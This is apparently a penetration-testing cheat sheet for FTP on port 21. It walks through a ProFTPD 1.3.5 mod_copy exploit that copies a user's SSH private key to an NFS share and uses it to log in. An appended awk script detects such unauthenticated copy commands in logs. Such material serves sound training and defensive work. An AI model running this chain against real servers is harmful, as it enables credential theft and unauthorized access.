21 - ftp

Enumeration

Use netcat to grab the FTP banner and identify the server version

nc $IP 21

Use searchsploit to search Exploit-DB for exploits matching that FTP server version

searchsploit ftp 1.2.3

Exploitation examples

ProFTPD 1.3.5 mod_copy

ProFTPD 1.3.5 has a vulnerability in the mod_copy module that allows the SITE CPFR and SITE CPTO commands to be used via netcat to copy files on the server. In this example we chain this exploit to copy Bob's SSH keys to a misconfigured NFS share, then mount the share on our attack machine to access the SSH keys.

# Use netcat to copy the file into an NFS share
nc $IP 21
# 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [<IP>]
SITE CPFR /home/bob/.ssh/id_rsa
# 350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
# 250 Copy successful

# Mount the nfs share and get bob's keys
mkdir nfs
sudo mount $IP:/var nfs
cp nfs/tmp/id_rsa id_rsa
sudo umount nfs

# Use SSH to log into a host
chmod 600 id_rsa
ssh -i id_rsa bob@$IP
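
A defender-side check for the session above, as an added example that is not part of the original page: it scans FTP command log lines for SITE CPFR / SITE CPTO pairs issued by a client with no authenticated user, as in the session shown, where no login precedes the copy. The log layout (time, client, user, quoted command, response code), the sample lines and the function name detect_preauth_copy are assumptions constructed for illustration.

```shell
#!/bin/sh
# Constructed sample lines. Assumed layout: time client user "command" code,
# with "-" in the user field when the session has not logged in.
SAMPLE_LOG='2024-01-01T10:00:00 10.0.0.5 - "SITE CPFR /home/bob/.ssh/id_rsa" 350
2024-01-01T10:00:01 10.0.0.5 - "SITE CPTO /var/tmp/id_rsa" 250
2024-01-01T10:05:00 10.0.0.9 alice "SITE CPFR /srv/ftp/a.txt" 350
2024-01-01T10:05:01 10.0.0.9 alice "SITE CPTO /srv/ftp/b.txt" 250
2024-01-01T10:06:00 10.0.0.7 - "SITE CPFR /etc/passwd" 350
2024-01-01T10:06:01 10.0.0.7 - "SITE CPTO /var/www/html/p.txt" 550'

# Read log lines on stdin and print one finding per mod_copy pair issued
# without an authenticated user: "<client> <COPIED|FAILED> <src> -> <dst>".
detect_preauth_copy() {
    awk '
    {
        client = $2; user = $3; code = $NF
        # The command text sits between the first and the last double quote.
        cmd = $0
        sub(/^[^"]*"/, "", cmd); sub(/"[^"]*$/, "", cmd)
        split(cmd, part, " ")
        verb = toupper(part[1] " " part[2])
        # Strip the two-word verb; whatever remains is the path (spaces kept).
        path = cmd; sub(/^[^ ]+ +[^ ]+ +/, "", path)
        if (user != "-") next      # authenticated copies are not reported here
        # 350 means the server accepted the source and awaits a destination.
        if (verb == "SITE CPFR" && code == "350") { src[client] = path; next }
        if (verb == "SITE CPTO" && (client in src)) {
            result = (code == "250") ? "COPIED" : "FAILED"
            printf "%s %s %s -> %s\n", client, result, src[client], path
            delete src[client]
        }
    }'
}

printf '%s\n' "$SAMPLE_LOG" | detect_preauth_copy
```

Findings marked COPIED whose destination falls under an exported or web-served directory correspond to the chain shown above and are the ones to triage first.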
